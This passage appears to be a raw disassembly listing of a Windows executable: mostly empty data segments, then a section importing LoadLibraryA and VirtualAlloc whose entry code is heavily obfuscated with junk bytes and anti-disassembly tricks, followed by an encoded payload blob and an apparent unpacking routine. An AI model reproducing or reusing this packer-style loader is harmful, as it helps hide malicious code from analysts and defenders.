dword_426BEC dd 0 ; DATA XREF: sub_401CC0+17E�r
; sub_41A391:loc_41A51C�w ...
byte_426BF0 db 0 ; DATA XREF: sub_401F1C+4B7�w
align 4
dd 3Fh dup(0)
dword_426CF0 dd 0 ; DATA XREF: sub_401F1C+44A�r
; sub_401F1C+483�w
dd 3 dup(0)
db 0
byte_426D01 db 0 ; DATA XREF: sub_401F1C:loc_4020A2�r
; sub_40243A+AF�w
align 10h
dword_426D10 dd 0 ; DATA XREF: sub_40243A:loc_4024C3�r
dd 15DDh dup(0)
dword_42C488 dd 59Ch dup(0) ; DATA XREF: sub_4026B9+2�o
db 0
byte_42DAF9 db 3 dup(0) ; DATA XREF: sub_401F1C+2�o
dd 1791h dup(0)
dword_433940 dd 0 ; DATA XREF: sub_40251A+A6�r
; sub_418552+501�r ...
db 0
byte_433945 db 0 ; DATA XREF: sub_401F1C+3E�r
; sub_41B5D2:loc_41B60E�w ...
align 4
dword_433948 dd 0 ; DATA XREF: sub_41B5D2+13B�w
dword_43394C dd 0 ; DATA XREF: sub_40251A+90�r
; sub_41B3D0:loc_41B53E�w ...
dword_433950 dd 5Eh dup(0) ; DATA XREF: sub_41A9DE+48A�o
dword_433AC8 dd 5Dh dup(0) ; DATA XREF: sub_41A9DE+4AD�o
dword_433C3C dd 0 ; DATA XREF: sub_417676+110�o
; sub_41BB84+43�o ...
dword_433C40 dd 0 ; DATA XREF: sub_417676+109�r
; sub_417676+122�r ...
dword_433C44 dd 0 ; DATA XREF: sub_40121E+20�r
; sub_40121E:loc_40127B�w ...
dword_433C48 dd 0 ; DATA XREF: sub_413F8F+14�o
; sub_414042+15�o ...
dword_433C4C dd 0 ; DATA XREF: sub_40243A:loc_402453�r
; sub_40243A:loc_402462�r ...
dword_433C50 dd 0 ; DATA XREF: sub_4016BA+20�r
; sub_4016BA:loc_401717�w ...
dword_433C54 dd 0 ; DATA XREF: seg000:0041C3CC�o
; seg000:0041C3D6�w
dword_433C58 dd 0 ; DATA XREF: seg000:0041C3B0�o
; seg000:0041C3BA�w
dword_433C5C dd 0 ; DATA XREF: seg000:0041C3E8�o
; seg000:0041C3F2�w
dword_433C60 dd 0 ; DATA XREF: seg000:0041C404�o
; seg000:0041C40E�w
dword_433C64 dd 0 ; DATA XREF: seg000:0041C420�o
; seg000:0041C42A�w
dword_433C68 dd 0 ; DATA XREF: sub_41A9DE+4FD�r
; seg000:0041C43E�w
dword_433C6C dd 0 ; DATA XREF: seg000:0041C466�o
; seg000:0041C470�w
dword_433C70 dd 0 ; DATA XREF: seg000:0041C482�o
; seg000:0041C48C�w
dword_433C74 dd 0 ; DATA XREF: seg000:0041C44A�o
; seg000:0041C454�w
dword_433C78 dd 0 ; DATA XREF: sub_403DA0�r sub_40A6DB�w ...
dword_433C7C dd 0 ; DATA XREF: sub_407370+28�r
; sub_407B70+1E�r ...
dword_433C80 dd 0 ; DATA XREF: sub_40A42B+34�r
dword_433C84 dd 0 ; DATA XREF: sub_4087E0+3C�w
; sub_4087E0+BF�w ...
dd 6 dup(0)
dword_433CA0 dd 0 ; DATA XREF: sub_4067D6+FD�r
; sub_40808A+87�r ...
dd 3Fh dup(0)
dword_433DA0 dd 0 ; DATA XREF: sub_40808A+2B�w
; sub_40808A+44�w ...
dd 7 dup(0)
dword_433DC0 dd 146h dup(0) ; DATA XREF: seg002:off_423950�o
; seg002:00423958�o
db 3 dup(0)
byte_4342DB db 0 ; DATA XREF: sub_40177B+71�o
dd 2B9h dup(0)
dword_434DC0 dd 0 ; DATA XREF: sub_40808A�r
; sub_40808A:loc_4080A4�w ...
dword_434DC4 dd 0 ; DATA XREF: sub_407B65�w
dword_434DC8 dd 0 ; DATA XREF: sub_40ABE1+B3�w
dword_434DCC dd 0 ; DATA XREF: sub_402D09+10�r
; sub_402D09+9B�w ...
dword_434DD0 dd 0 ; DATA XREF: sub_402D09+5�r
; sub_402D09+87�w ...
dword_434DD4 dd 0 ; DATA XREF: sub_404E03�r
; sub_404E03+11�w ...
dword_434DD8 dd 0 ; DATA XREF: sub_407979:loc_4079E2�r
; sub_407979+74�o ...
dword_434DDC dd 0 ; DATA XREF: sub_405ADD+28�w
; sub_405B25�r ...
dword_434DE0 dd 0 ; DATA XREF: sub_405ADD+15�w
; sub_405B25+6�r ...
dword_434DE4 dd 0 ; DATA XREF: sub_403691+13�r
; sub_405ADD+36�w ...
dword_434DE8 dd 0 ; DATA XREF: sub_405ADD+2F�w
; sub_405B50+2FC�w ...
dword_434DEC dd 0 ; DATA XREF: sub_405ADD+3C�w
; sub_405E64�r ...
dword_434DF0 dd 0 ; DATA XREF: sub_405B50+229�r
; sub_405B50+249�r ...
dword_434DF4 dd 0 ; DATA XREF: sub_402A45:loc_402A7E�r
; sub_403603+13�r ...
dword_434DF8 dd 0 ; DATA XREF: seg000:0040404B�w
; sub_40AB84:loc_40AB95�r ...
align 400h
seg002 ends
; Section 4. (virtual address 00035000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00035000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
seg003 segment para public 'BSS' use32
assume cs:seg003
;org 435000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dd 2 dup(0)
dd 4, 10000h, 18h, 80000018h, 2 dup(0)
dd 4, 10000h, 1, 80000030h, 2 dup(0)
dd 4, 10000h, 409h, 48h, 35058h, 56h, 4E4h, 0
aAssemblyXmlnsU db '<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersio'
db 'n="1.0">',0Dh,0Ah
db '</assembly>PA',0
align 4
dd 221h dup(0)
db 3 dup(0)
byte_43593B db 0 ; DATA XREF: sub_403691+2�o
align 800h
seg003 ends
; Section 5. (virtual address 00036000)
; Virtual size : 0000B000 ( 45056.)
; Section size in file : 0000B000 ( 45056.)
; Offset to raw data for section: 00036000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
seg004 segment para public 'BSS' use32
assume cs:seg004
;org 436000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dd 36028h, 2 dup(0)
dd 3604Fh, 36028h, 5 dup(0)
dd 77E805D8h, 77E7980Ah, 0
aLoadlibrarya db 'LoadLibraryA',0
align 2
aVirtualalloc db 'VirtualAlloc',0
aKernel32_dl_11 db 'KERNEL32.dll',0
; =============== S U B R O U T I N E =======================================
public start
start proc near
call near ptr loc_436061+1
loc_436061: ; CODE XREF: start�p
sub al, 59h
start endp ; sp-analysis failed
rol ecx, 5
jmp short loc_43606A
; ---------------------------------------------------------------------------
db 0E1h, 0B4h
; ---------------------------------------------------------------------------
loc_43606A: ; CODE XREF: seg004:00436066�j
rep ror ecx, 16h
test ecx, ecx
adc ecx, edx
clc
jnb short near ptr loc_436075+1
loc_436075: ; CODE XREF: seg004:00436073�j
db 36h
call near ptr loc_43607B+2
loc_43607B: ; CODE XREF: seg004:loc_436075�p
test eax, 3BF35954h
enter 3F3h, 0C2h
lea esi, dword_43625C
jmp short loc_43608E
; ---------------------------------------------------------------------------
db 76h, 2Eh
; ---------------------------------------------------------------------------
loc_43608E: ; CODE XREF: seg004:0043608A�j
stc
jb short loc_436092
into
loc_436092: ; CODE XREF: seg004:0043608F�j
stc
jb short near ptr loc_436095+1
loc_436095: ; CODE XREF: seg004:00436093�j
mov ecx, 0C1F2D9F7h
leave
adc ecx, [ebp+4001Dh]
add bl, dh
neg ecx
neg eax
cmp eax, eax
rep sub cl, 0AEh
clc
jnb short loc_4360B1
popf
loc_4360B1: ; CODE XREF: seg004:004360AE�j
sub eax, eax
jmp short loc_4360B6
; ---------------------------------------------------------------------------
db 98h
; ---------------------------------------------------------------------------
loc_4360B6: ; CODE XREF: seg004:004360B3�j
and ecx, 0FFFFFFC4h
jmp short loc_4360BC
; ---------------------------------------------------------------------------
db 0CCh
; ---------------------------------------------------------------------------
loc_4360BC: ; CODE XREF: seg004:004360B9�j
mov al, [esi]
mov dl, [esi]
xor cl, 0C1h
rep or ecx, edi
jmp short loc_4360CA
; ---------------------------------------------------------------------------
db 6Fh, 0E2h
; ---------------------------------------------------------------------------
loc_4360CA: ; CODE XREF: seg004:004360C6�j
stc
jb short loc_4360CE
dec ebp
loc_4360CE: ; CODE XREF: seg004:004360CB�j
adc eax, edx
not eax
dec eax
stc
jb short near ptr loc_4360D6+1
loc_4360D6: ; CODE XREF: seg004:004360D4�j
mov ch, 0F2h
and eax, ebx
jmp short loc_4360DE
; ---------------------------------------------------------------------------
db 0CDh, 20h
; ---------------------------------------------------------------------------
loc_4360DE: ; CODE XREF: seg004:004360DA�j
add dl, bl
clc
jnb short near ptr loc_4360E3+1
loc_4360E3: ; CODE XREF: seg004:004360E1�j
enter 0FFFFC8C1h, 10h
or cl, 0F8h
rep xor eax, eax
rep movzx ecx, cl
add dl, 2
sal ecx, 9
movsx ecx, si
call near ptr loc_4360FF+1 ; CODE XREF: seg004:00436110�j
loc_4360FF: ; CODE XREF: seg004:004360FA�p
rcr byte ptr [eax+0Fh], 0BEh
leave
jmp short loc_436107
; ---------------------------------------------------------------------------
db 6Bh
; ---------------------------------------------------------------------------
loc_436107: ; CODE XREF: seg004:00436104�j
add dl, 5Ah
jmp short loc_43610D
; ---------------------------------------------------------------------------
db 0BAh
; ---------------------------------------------------------------------------
loc_43610D: ; CODE XREF: seg004:0043610A�j
clc
jnb short near ptr loc_436110+1
loc_436110: ; CODE XREF: seg004:0043610E�j
ja short near ptr loc_4360FA+3
add cl, ch
and al, bh
jnb short loc_436119
dec ebp
loc_436119: ; CODE XREF: seg004:00436116�j
xchg eax, ecx
sub edx, 383943BBh
clc
jnb short near ptr loc_436123+1
loc_436123: ; CODE XREF: seg004:00436121�j
sbb eax, 0CAF180F2h
jmp short loc_43612B
; ---------------------------------------------------------------------------
db 0Eh
; ---------------------------------------------------------------------------
loc_43612B: ; CODE XREF: seg004:00436128�j
jmp short loc_43612E
; ---------------------------------------------------------------------------
db 0C1h
; ---------------------------------------------------------------------------
loc_43612E: ; CODE XREF: seg004:loc_43612B�j
ror eax, 11h
xor dl, 2Ah
jmp short loc_436138
; ---------------------------------------------------------------------------
dw 20CDh
; ---------------------------------------------------------------------------
loc_436138: ; CODE XREF: seg004:00436134�j
jmp short loc_43613C
; ---------------------------------------------------------------------------
dw 20CDh
; ---------------------------------------------------------------------------
loc_43613C: ; CODE XREF: seg004:loc_436138�j
and ecx, 4Ch
jmp short loc_436143
; ---------------------------------------------------------------------------
db 0CDh, 20h
; ---------------------------------------------------------------------------
loc_436143: ; CODE XREF: seg004:0043613F�j
repne ror eax, 2
xor edx, 1592E4C2h
repne and ecx, edi
neg eax
jmp short loc_436156
; ---------------------------------------------------------------------------
db 0CDh, 20h
; ---------------------------------------------------------------------------
loc_436156: ; CODE XREF: seg004:00436152�j
xor ecx, 0EA18BB38h
shr ecx, 1Dh
sub edx, 1D8EA18Bh
jmp short loc_436169
; ---------------------------------------------------------------------------
db 0Ch
db 75h
; ---------------------------------------------------------------------------
loc_436169: ; CODE XREF: seg004:00436165�j
sal ecx, 15h
rep add eax, ecx
repne xor ecx, edi
jmp short loc_436176
; ---------------------------------------------------------------------------
db 81h, 5
; ---------------------------------------------------------------------------
loc_436176: ; CODE XREF: seg004:00436172�j
sub dl, 60h
sub al, 0C0h
rep rol eax, 0Eh
jmp short loc_436182
; ---------------------------------------------------------------------------
db 0BAh
; ---------------------------------------------------------------------------
loc_436182: ; CODE XREF: seg004:0043617F�j
clc
jnb short loc_436186
pop ss
loc_436186: ; CODE XREF: seg004:00436183�j
clc
jnb short loc_43618A
popa
loc_43618A: ; CODE XREF: seg004:00436187�j
sub edx, 0D4844198h
clc
jnb short near ptr loc_436193+1
loc_436193: ; CODE XREF: seg004:00436191�j
or al, 0F2h
and ecx, 0E89EA422h
repne cmp ecx, ecx
repne add al, 13h
rep or eax, 47h
repne sub edx, 207D44C4h
xor ecx, 37040FA8h
rep imul ecx, eax, 7
neg ecx
rep adc ecx, ebx
stc
jb short near ptr loc_4361BE+1
loc_4361BE: ; CODE XREF: seg004:004361BC�j
rep xor dl, bl
sub eax, 7Dh
jmp short loc_4361C7
; ---------------------------------------------------------------------------
db 97h
; ---------------------------------------------------------------------------
loc_4361C7: ; CODE XREF: seg004:004361C4�j
jmp short loc_4361CB
; ---------------------------------------------------------------------------
db 52h, 75h
; ---------------------------------------------------------------------------
loc_4361CB: ; CODE XREF: seg004:loc_4361C7�j
jmp short loc_4361CF
; ---------------------------------------------------------------------------
db 55h, 0F7h
; ---------------------------------------------------------------------------
loc_4361CF: ; CODE XREF: seg004:loc_4361CB�j
rep add eax, 77h
rep sub dl, 4Fh
mov cl, [esi]
repne neg eax
repne or ecx, 1Bh
jmp short loc_4361E4
; ---------------------------------------------------------------------------
dw 0BED0h
; ---------------------------------------------------------------------------
loc_4361E4: ; CODE XREF: seg004:004361E0�j
neg eax
mov [esi], dl
loc_4361E8: ; CODE XREF: seg004:004361F3�j
stc
jb short loc_4361EC
pop ss
loc_4361EC: ; CODE XREF: seg004:004361E9�j
jmp short loc_4361F0
; ---------------------------------------------------------------------------
dw 20CDh
; ---------------------------------------------------------------------------
loc_4361F0: ; CODE XREF: seg004:loc_4361EC�j
clc
jnb short near ptr loc_4361F3+1
loc_4361F3: ; CODE XREF: seg004:004361F1�j
loopne loc_4361E8
or ecx, ecx
jmp short loc_4361FA
; ---------------------------------------------------------------------------
db 67h
; ---------------------------------------------------------------------------
loc_4361FA: ; CODE XREF: seg004:004361F7�j
rep inc esi
xor ecx, edx
stc
jb short near ptr loc_436201+1
loc_436201: ; CODE XREF: seg004:004361FF�j
mov bl, 0EBh
add ch, [ebp-47h]
sal eax, 19h
repne and ecx, 4Bh
repne dec ebx
add ecx, 5
jmp short loc_436215
; ---------------------------------------------------------------------------
db 48h
; ---------------------------------------------------------------------------
loc_436215: ; CODE XREF: seg004:00436212�j
repne xor al, 92h
add eax, 61h
mov cl, [esi]
rep and ebx, 0FFFFFFFFh
repne mov ecx, esi
movsx ecx, si
jmp short loc_43622B
; ---------------------------------------------------------------------------
db 9Dh, 0EFh
; ---------------------------------------------------------------------------
loc_43622B: ; CODE XREF: seg004:00436227�j
movzx ecx, al
jmp short loc_436231
; ---------------------------------------------------------------------------
db 1Dh
; ---------------------------------------------------------------------------
loc_436231: ; CODE XREF: seg004:0043622E�j
movzx ecx, cl
rep movzx ecx, cl
rep mov ecx, esi
rol eax, 4
call near ptr loc_436243+1
loc_436243: ; CODE XREF: seg004:0043623E�p
or ebx, [eax+0Fh]
test [esi-2], esp
; ---------------------------------------------------------------------------
db 2 dup(0FFh), 0EBh
dd 0F220CD02h, 41F2C903h, 700173F8h, 0FCCF2BF3h
dword_43625C dd 0C118E1C1h, 72F905C1h, 0F0C17401h, 0D8F7F209h, 0C1C32BF2h
; DATA XREF: seg004:00436084�o
dd 2CF20CF0h, 2102EB8Ah, 0C3BE0F3Fh, 0C9B60FF3h, 460302EBh
dd 1E8h, 0F2593000h, 0C1F2CF03h, 72F91AE1h, 91F24D01h
dd 406602EBh, 20CD02EBh, 0BE08C1C1h, 43665Ch, 56C981F3h
dd 33A22E28h, 445C0DC7h, 1EB3601h, 60142545h, 2EB79B3h
dd 72F920CDh, 0BE0F8001h, 6602EBCBh, 172F9F3h, 0F1D8D6Ch
dd 0EB0000A4h, 1EBF301h, 172F95Eh, 173F8ABh, 5DC88375h
dd 6E0173F8h, 2F6D02EBh, 2FE083F3h, 7AF102EBh, 1AE8C1F2h
dd 930173F8h, 520173F8h, 924A02EBh, 20CD02EBh, 920173F8h
dd 0EB9201EBh, 0F320CD02h, 0F93FF183h, 0F410172h, 0B60FC9BEh
dd 7E02EB16h, 0CD02EBC5h, 2B01EB20h, 0BC501EBh, 0CD02EBC1h
dd 0E8C92320h, 2, 0F959BB76h, 0F9370172h, 0F2060172h, 0E980C13Bh
dd 0CB24F2A8h, 20CD02EBh, 0F0724F3h, 0BF2C9BEh, 2DC980C3h
dd 810173F8h, 80F3C90Bh, 0C1F20FEAh, 0C08512E1h, 8A11C16Bh
dd 0CD02EB0Eh, 0EBC20320h, 0EB20CD02h, 0EB4FC702h, 0C149F802h
dd 0D30209E8h, 0E86201EBh, 1, 2E85993h, 0A4000000h, 2E85952h
dd 82000000h, 0C86B59C1h, 0CD02EB2Dh, 0C93B4120h, 5DF602EBh
dd 0CBBE02EBh, 0EFEA81F3h, 0F344CDF2h, 0E81EE0C1h, 1, 72F95833h
dd 2EB2601h, 0BE0F20CDh, 0F27004C9h, 0F1C1CE33h, 8CE1810Dh
dd 0E8F6611Ch, 1, 0D3325972h, 0EB02F1C1h, 0F220CD02h, 0F8FBF180h
dd 0F8670173h, 0F3CC0173h, 72F9DF24h, 73F85601h, 1E8EA01h
dd 0B7000000h, 172F958h, 0EBD32AF6h, 0EB20CD02h, 0EB4D4B02h
dd 0C1B4D402h, 2E814E8h, 42000000h, 0E18358A1h, 0BF0C1B0h
dd 9D0173F8h, 0F2C11349h, 0EB76F280h, 0F820CD02h, 0F8B70173h
dd 0EB360173h, 0F920CD02h, 0F2A00172h, 2EBCF0Bh, 0BE0F20CDh
dd 0E1C1F2C9h, 1E80Bh, 591C0000h, 0C7EA81F2h, 0F27BBA9Dh
dd 73F8CE33h, 0DD24D401h, 8ABD01EBh, 0ED02EB0Eh, 0C68BF3E0h
dd 0E9EB02EBh, 1E9E02EBh, 63D302EBh, 0BF3D332h, 172F9CEh
dd 0C9B60FD8h, 0E00173F8h, 0EB06BE0Fh, 8B20CD02h, 172F9CFh
dd 2E8FBh, 3070000h, 1E858h, 59B00000h, 0ACEA81F3h, 0F297AADAh
dd 0F9C9B60Fh, 0EB560172h, 0F320CD02h, 2EB2F2Ch, 2EB20CDh
dd 72F972AAh, 0C1035501h, 0F94E01EBh, 81490172h, 469C92F2h
dd 0C71BF241h, 73F8D9F7h, 0F3411401h, 0EB1EE8C1h, 0F94E9B02h
dd 0F8D30172h, 0EB3A0173h, 72F9A701h, 0D3025401h, 20CD02EBh
dd 10173F8h, 83F3D1F7h, 0F82D07F1h, 0F32DF775h, 2EBC22Bh
dd 73F820CDh, 0C02BDD01h, 8B702EBh, 73F8D32Ah, 2EB8B01h
dd 80F2C211h, 0F848C2E9h, 0F85B0173h, 0EB6B0173h, 0F920CD02h
dd 0EB0B0172h, 0EB20CD02h, 88C8A802h, 0CA8BF216h, 640172F9h
dd 0C71A05F2h, 1E831BAh, 8E000000h, 0CD02EB59h, 0CD02EB20h
dd 0D0F7F320h, 20CD02EBh, 909802EBh, 4690C980h, 0FC8C1F3h
dd 0F32401EBh, 0EB2FF180h, 2D8CE802h, 0EB51968Ch, 0B40173F8h
dd 0F9C723F2h, 0EB460172h, 8A20CD02h, 72F94B0Eh, 2E8D701h
dd 0F6000000h, 2EB597Bh, 2EB20CDh, 0C03B20CDh, 1E8h, 0EB598200h
dd 0F320CD02h, 0F88FE183h, 80AC0173h, 0E383B5C9h, 6201EBFFh
dd 9DCC02EBh, 0EBC9BE0Fh, 0C08B9D01h, 0EBC78BF2h, 0EB20CD02h
dd 0E820CD02h, 2, 0F58D5ABh, 2EBC9B6h, 91F220CDh, 0F3C9B60Fh
dd 2EBC88Bh, 2E820CDh, 0F4000000h, 1EB59FAh, 0CD02EB17h
dd 0BE0FF320h, 0BE0FF2C9h, 0C9850FC1h, 0EBFFFFFCh, 81ECB402h
dd 0E543ECE9h, 3E02EB02h, 172F954h, 172F987h, 19F0C150h
dd 0E9C1F349h, 172F91Eh, 173F8D3h, 0ED01EBDAh, 9AACB855h
dd 0B991DEh, 35000002h, 919E9AACh, 32FFCA83h, 0D3FF0154h
dd 0E8F8E2C2h, 0F2h, 6028BDFCh, 406A0043h, 300068h, 20006800h
dd 8B510001h, 3A800455h, 0C1940FCCh, 0D2FFD103h, 756958Dh
dd 52500000h, 748B6050h, 7C8B2424h, 0CD832824h, 0F9C933FFh
dd 68A0CEBh, 47078846h, 973DB02h, 1E8AF475h, 72DB1246h
dd 1B8EDh, 0DB020000h, 1E8A0575h, 13DB1246h, 73DB02C0h
dd 8A0775F1h, 0DB12461Eh, 0E883E873h, 0C10D7203h, 68A08E0h
dd 0FFF08346h, 0E88B6E74h, 575DB02h, 12461E8Ah, 2C913DBh
dd 8A0575DBh, 0DB12461Eh, 1C75C913h, 75DB0241h, 461E8A05h
dd 0C913DB12h, 0F173DB02h, 1E8A0775h, 73DB1246h, 2C183E8h
dd 0F300FD81h, 0D183FFFFh, 3D548D01h, 0FCFD8300h, 28A0E76h
dd 47078842h, 0E9F77549h, 0FFFFFF70h, 0C283028Bh, 83078904h
dd 0E98304C7h, 3F17704h, 0E9C933F9h, 0FFFFFF58h, 28247C2Bh
dd 1C247C89h, 0B958C361h, 0F2h, 0FF015428h, 0F8E2C2D3h
dd 2EBC350h, 7C83AE9Dh, 0EB000424h, 0EBAE9D02h, 98689D01h
dd 0EB77E79Fh, 0C320CD02h, 2 dup(0AE9D02EBh), 67AC6855h
dd 2EB0043h, 0C320CDh, 2EBEC8Bh, 75FFAE9Dh, 0CD02EB08h
dd 9D02EB20h, 0A83D68AEh, 0CD6877E7h, 0EB004367h, 0C320CD02h
dd 2EBC300h, 2EB20CDh, 0C15520CDh, 0EC8B00F0h, 20CD02EBh
dd 0EB1075FFh, 0FFAE9D02h, 2EB0C75h, 75FFAE9Dh, 9D01EB08h
dd 2EBFF6Ah, 0F0C1AE9Dh, 3640E900h, 0F0C177A4h, 0F0C100h
dd 0F0C155h, 2EBEC8Bh, 75FF20CDh, 9D02EB14h, 1075FFAEh
dd 0AE9D02EBh, 0EB0C75FFh, 75FF9D01h, 0CD02EB08h, 0EBFF6A20h
dd 2EB9D01h, 1B68AE9Dh, 0EB77E798h, 0C3AE9D02h, 0AE9D02EBh
dd 43684F68h, 0CD02EB00h, 8300C320h, 4247Ch, 539D01EBh
dd 0AE9D02EBh, 0F0C156h, 20CD02EBh, 0E805DF68h, 9D02EB77h
dd 7968C3AEh, 0EB004368h, 0C320CD02h, 0D31CD600h, 43DF1AB5h
dd 7C8B9304h, 0EB10FE24h, 0E881F202h, 0E232ED01h, 0FC25BF8Fh
dd 725703EBh, 0F122BB7h, 0F6A6238Ah, 424648Dh, 4DFE3209h
dd 926ECF9h, 0C1ED2C67h, 0DB2E00F1h, 5C0387C7h, 20CD9F97h
dd 64C11863h, 368DC92Ch, 23D5D15h, 3BB2AD8h, 0DB29B21Fh
dd 0A5978003h, 80FE915Eh, 840FFF3Fh, 21D60458h, 3A903626h
dd 6893094Ch, 332F626h, 7B037AFBh, 0F5BD6D01h, 9DF4C1F0h
dd 1D9E2231h, 3EBAC0Fh, 211B11A4h, 4DAF3EC8h, 560EC6BFh
dd 5B1C52F7h, 0D8B8124Eh, 0FB471547h, 75EE3503h, 2AAA1B1Bh
dd 430A57E1h, 4484363Bh, 1B16926Bh, 680753ABh, 7103F770h
dd 0F7322501h, 600F7C1h, 730372FDh, 8BB5A01h, 1B263A3Eh
dd 453D59E6h, 0D3F993E6h, 374117Fh, 6E01D875h, 47ECD90Eh
dd 717F8FEDh, 0E42131FFh, 1770376h, 37557508h, 5B2B0DBDh
dd 0A451C1F7h, 0FD75AE7Bh, 49381B28h, 8036031Fh, 350E6324h
dd 6AC9FB64h, 66890F7Bh, 1FC93226h, 9B2FA384h, 7CFE092Bh
dd 0E1017D03h, 4A9226C9h, 0FD46D26Ch, 0F6C1058Ch, 0C03C7B8h
dd 0EC0B3D56h, 6C19DFE9h, 1C9B23E3h, 10B306F4h, 0B19E4662h
dd 810BB216h, 0CEFF037Ch, 0D975211Dh, 943636D7h, 8D9C1DF2h
dd 18E19B0Eh, 0EA6EC36h, 1D232463h, 0C28300F3h, 56036E30h
dd 0C948DEF7h, 0CEB7C2Fh, 0C41B2122h, 0B60FF83Fh, 0AD90D007h
dd 3AEC191Dh, 6C154FC0h, 0EE9BD723h, 9741DC09h, 0BE017990h
dd 0EE5E9AFBh, 0F7C1963Ah, 49F187CEh, 0F0F54D84h, 0AFBE9BF4h
dd 0B4F4C03h, 0E78224DFh, 7FB5037Eh, 2937F6C8h, 43D7E10Dh
dd 89F51BC6h, 417210B7h, 3C524B69h, 4AFC425Dh, 6C2E123Ch
dd 3F7E919h, 0D15E1E1Dh, 84C6F615h, 1DD55376h, 2017BB5Ch
dd 0ED7860A9h, 49767A94h, 93771D39h, 2D083AADh, 0C06C0D6Ch
dd 0C5F39B9Dh, 0BF32F21Bh, 1F89E5EDh, 5A6C783h, 0A7030DBFh
dd 386BB4BAh, 29D8DB30h, 6154D1C6h, 0D673FB6Fh, 0D8A41E34h
dd 36604BF2h, 6C4D6AA1h, 18BA5C93h, 0F7C15E2Eh, 37782C13h
dd 49D073FBh, 0C71BF77Bh, 70C07F04h, 0CC3880F3h, 0E8F474FCh
dd 2700A721h, 41EC0390h, 6C379624h, 8A994165h, 0E9E5A310h
dd 0BC7D46EEh, 0D280817h, 9187DF5Fh, 7309F5C1h, 0E3CB6AD8h
dd 2D5900F4h, 20EF098Dh, 3B7DC67h, 1571C91Bh, 841684B1h
dd 3EF711F5h, 0EB273EA5h, 0FD9985E1h, 4203BD73h, 14BBEFEAh
dd 0AD2B6362h, 0EE10CB0h, 34EF1B4h, 69E3FDB2h, 6D03FA33h
dd 1F9DA203h, 9069832Eh, 64B9036Eh, 0D6B8B65Dh, 0F745970Bh
dd 0AC98947Ch, 760D33DDh, 0F791281Fh, 0FB1FE947h, 0BAD5F76Bh
dd 6C20FFCh, 620E1367h, 0B9911FE8h, 5D106395h, 0F3BAA19h
dd 711B1054h, 0C93F2686h, 8D0B8CE4h, 955B2417h, 6BC78F58h
dd 0CF6D0B4Ch, 96DD0DECh, 0FD121127h, 0C25F5E5Bh, 0D430000Ch
dd 6BEBE067h, 7654F875h, 0FF81FA9Dh, 52535756h, 0D800E851h
dd 0FF000004h, 77073096h, 0FF0E612Ch, 951BAEEh, 6DC41999h
dd 0F48F07FFh, 0A535706Ah, 0A3E9FF63h, 329E6495h, 0EFFDB88h
dd 79DCB8A4h, 0FFD5E91Eh, 0D2D988E0h, 0B64C2B97h, 7CBD09FFh
dd 2D077EB1h, 91E7FFB8h, 6490BF1Dh, 1DFFB710h, 6AB020F2h
dd 0FFB97148h, 0BE41DEF3h, 0DAD47D84h, 0E4EB1AFFh, 0B5516DDDh
dd 0C7F4FFD4h, 5683D385h, 13FF6C98h, 646BA8C0h, 0FF62F97Ah
dd 65C9ECFDh, 15C4F8Ah, 6CD914FFh, 3D636306h, 0F5FAFF0Fh
dd 0C88D080Dh, 3BFF6E20h, 4C69105Eh, 0FF6041E4h, 677172D5h
dd 3E4D1A2h, 0D4473CFFh, 85FD4B04h, 6BD2FF0Dh, 0FAA50AB5h
dd 35FFB5A8h, 42B2986Ch, 0FFBBC9D6h, 0BCF940DBh, 0D86CE3ACh
dd 5C7532FFh, 0DCF45DFh, 59DCFFD6h, 0ACABD13Dh, 26FFD930h
dd 51DE003Ah, 0FFD75180h, 0D06116C8h, 0B4F4B5BFh, 0C42321FFh
dd 959956B3h, 0FCFFFBAh, 9EB8BDA5h, 28FF02B8h, 5F058808h
dd 0FF0CD9B2h, 0BE924C6h, 6F7C87B1h, 4C112FFFh, 1DAB5868h
dd 3DC1FF61h, 90B6662Dh, 76FFDC41h, 1DB7106h, 0FFD220BCh
dd 0D5102A98h, 0B18589EFh, 0B51F71FFh, 0E4A506B6h, 339FFFBFh
dd 0A2E8B8D4h, 78FF07C9h, 0F00F934h, 0FF09A88Eh, 0E981896h
dd 6A0DBBE1h, 3D2D7FFFh, 6C97086Dh, 7B91A564h, 0F4E663FFh
dd 626B6B51h, 1C6CFF61h, 856530D8h, 62FF004Eh, 695EDF2h
dd 0C6A57B6Ch, 0FF8D1B01h, 0C4578208h, 0FFC6F50Fh, 5065B0D9h
dd 0EA12B7E9h, 0BFBEB8C1h, 0FCB988DBh, 0DDFF1DDFh, 0DA2D4962h
dd 0FF7CF315h, 4C658CD3h, 6158FBD4h, 0CE4DB2E1h, 743A7F2Ch
dd 0E2A3BC00h, 0D4BB30FFh, 4ADFA541h, 0D895DBD7h, 0D1FFC461h
dd 0D6F4FBA4h, 0FFE96AD3h, 0D9FC4369h, 8846346Eh, 0D0AD67FFh
dd 73DA60B8h, 4404FF2Dh, 33031DE5h, 0AFF4C5Fh, 0D7CC9AAh
dd 0FF713CDDh, 41AA5005h, 10102702h, 86BE0BFFh, 25C90C20h
dd 5768FFB5h, 206F85B3h, 66FFD409h, 61E49FB9h, 0FFF90ECEh
dd 0C9985EDEh, 982229D9h, 0B4B0D0FFh, 17C7D7A8h, 59B3FF3Dh
dd 2EB40D81h, 0BDFF5C3Bh, 0BA6CADB7h, 0FF8320C0h, 0B3B6EDB8h
dd 0E20C9ABFh, 9A03B6FFh, 3974B1D2h, 0EAD5FF47h, 9DD277AFh
dd 0DBFF2615h, 0DC168304h, 0FF0B1273h, 3B84E363h, 6A3E9464h
dd 0A80D6DFFh, 0B7A6A5Ah, 0E40EFFCFh, 9309FF9Dh, 0FFAE27h
dd 79EB10Ah, 0FF93447Dh, 0A3D2F00Fh, 0F2688708h, 0FE1E01FFh
dd 5D6906C2h, 0F762FF57h, 806567CBh, 6CFF3671h, 6B06E719h
dd 0FF1B766Eh, 2BE0FED4h, 7A5A89D3h, 0CC10DAFFh, 6F67DD4Ah
dd 0F9B9FFDFh, 8EBEEFF9h, 0B7FABE43h, 0B08ED517h, 0D6A342DFh
